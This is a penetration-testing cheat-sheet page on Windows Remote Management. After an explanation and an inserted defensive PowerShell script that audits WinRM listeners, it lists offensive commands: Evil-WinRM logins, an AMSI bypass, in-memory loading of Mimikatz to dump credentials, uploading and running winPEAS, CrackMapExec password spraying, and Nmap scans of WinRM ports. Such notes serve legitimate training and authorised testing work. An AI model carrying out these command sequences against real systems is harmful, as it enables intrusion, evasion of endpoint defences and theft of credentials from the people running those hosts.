# WinRM

## <mark style="color:yellow;">ABOUT</mark>

<mark style="color:red;">**Windows Remote Management (WinRM)**</mark> is a simple, Windows-integrated <mark style="color:purple;">**remote management protocol**</mark> <mark style="color:yellow;">**based on the command line**</mark>. WinRM uses the **Simple Object Access Protocol (SOAP)** to establish connections to remote hosts and their applications. WinRM communicates over TCP ports `5985` (HTTP) and `5986` (HTTPS). Services such as PowerShell remote sessions and event log merging require WinRM.
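The ports and transports above are exactly what an administrator should verify on a host that exposes WinRM. The following script is an added example, not part of the original page or of any tool it mentions: it walks the `WSMan:` drive to list every listener, flags an HTTP-only listener, and reports the two service settings that weaken WinRM sessions (`AllowUnencrypted` and `Basic` authentication). It assumes it runs in an elevated PowerShell on the host being audited; the function name `Test-WinRmHardening` is my own.

```powershell
# Added example (not from the original page): audit the local WinRM listeners
# and the service settings that matter for the HTTP/HTTPS ports described above.
# Assumes an elevated PowerShell session on the host being audited.
function Test-WinRmHardening {
    [CmdletBinding()]
    param()

    $findings = [System.Collections.Generic.List[object]]::new()

    # Each child of WSMan:\localhost\Listener is one listener; its own children
    # are name/value pairs such as Address, Transport, Port and Enabled.
    $listeners = Get-ChildItem -Path 'WSMan:\localhost\Listener' -ErrorAction Stop
    $hasHttps  = $false

    foreach ($listener in $listeners) {
        $props     = Get-ChildItem -Path $listener.PSPath
        $transport = ($props | Where-Object Name -eq 'Transport').Value
        $port      = ($props | Where-Object Name -eq 'Port').Value
        $address   = ($props | Where-Object Name -eq 'Address').Value
        $enabled   = ($props | Where-Object Name -eq 'Enabled').Value

        if ($transport -eq 'HTTPS' -and $enabled -eq 'true') { $hasHttps = $true }

        $findings.Add([pscustomobject]@{
            Check    = "Listener $($listener.Name)"
            Value    = "$transport on $address port $port (enabled: $enabled)"
            Severity = if ($transport -eq 'HTTP') { 'Info' } else { 'OK' }
            Advice   = if ($transport -eq 'HTTP') { 'Prefer HTTPS (5986) or restrict Address to management networks' } else { '' }
        })
    }

    if (-not $hasHttps) {
        $findings.Add([pscustomobject]@{
            Check    = 'HTTPS listener present'
            Value    = 'No enabled HTTPS listener'
            Severity = 'Warning'
            Advice   = 'Create an HTTPS listener bound to a trusted certificate'
        })
    }

    # Service-level settings: unencrypted traffic and Basic auth are the two
    # knobs that let credentials or session content travel in the clear.
    $allowUnencrypted = (Get-Item -Path 'WSMan:\localhost\Service\AllowUnencrypted').Value
    $basicAuth        = (Get-Item -Path 'WSMan:\localhost\Service\Auth\Basic').Value

    $findings.Add([pscustomobject]@{
        Check    = 'Service\AllowUnencrypted'
        Value    = $allowUnencrypted
        Severity = if ($allowUnencrypted -eq 'true') { 'Warning' } else { 'OK' }
        Advice   = if ($allowUnencrypted -eq 'true') { 'Set to false so sessions always use message or transport encryption' } else { '' }
    })
    $findings.Add([pscustomobject]@{
        Check    = 'Service\Auth\Basic'
        Value    = $basicAuth
        Severity = if ($basicAuth -eq 'true') { 'Warning' } else { 'OK' }
        Advice   = if ($basicAuth -eq 'true') { 'Disable Basic; rely on Kerberos/Negotiate' } else { '' }
    })

    return $findings
}

# Usage: print the findings as a table, warnings first.
Test-WinRmHardening | Sort-Object Severity -Descending | Format-Table -AutoSize
```

The script only reads configuration; to change a setting you would use `Set-Item` on the same `WSMan:` path (for example `Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $false`). Running it on a fleet via an existing management channel gives a quick inventory of which hosts still answer on `5985` without an HTTPS counterpart.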

## <mark style="color:yellow;">Evil-WinRM</mark>

```bash
evil-winrm -i 13.13.13.13 -u venator17 -p password123
```

> Use `menu` to see evil-winrm's built-in commands and the scripts it has loaded.

> Before loading any script or executable, we need to bypass the Antimalware Scan Interface (AMSI). Evil-WinRM's `Bypass-4MSI` command does this by patching it.

### <mark style="color:blue;">Load Scripts</mark>

Start evil-winrm from the attacker shell, pointing `-s` at the local directory that holds the PowerShell scripts:

```bash
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is the local directory containing the scripts
```

Then, inside the evil-winrm session:

```powershell
Bypass-4MSI # Bypass AMSI
Invoke-Mimikatz.ps1 # Load the script into memory
Invoke-Mimikatz # Execute it
```

### <mark style="color:blue;">Loading Executables</mark>

Start evil-winrm with `-e` pointing at the local directory that holds the executables:

```bash
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is the local directory containing the executables
```

Then, inside the evil-winrm session:

```powershell
Invoke-Binary /opt/executables/winPEAS.exe
```

### <mark style="color:blue;">Loading Files</mark>

> You can only upload files from the directory in which you started evil-winrm.

```powershell
upload /opt/executables/winPEAS.exe
./winPEAS.exe
```

## <mark style="color:yellow;">Nmap WinRM</mark>

```bash
nmap -sV -sC 13.13.13.13 -p5985,5986 --disable-arp-ping -n
```

## <mark style="color:yellow;">CrackMapExec</mark>

```bash
crackmapexec winrm 13.13.13.13 -u user.list -p password
```

## <mark style="color:yellow;">PowerShell</mark>

```powershell
PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)
PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred
```

## <mark style="color:yellow;">RESOURCES</mark>

{% embed url="https://www.hackingarticles.in/a-detailed-guide-on-evil-winrm/" %}
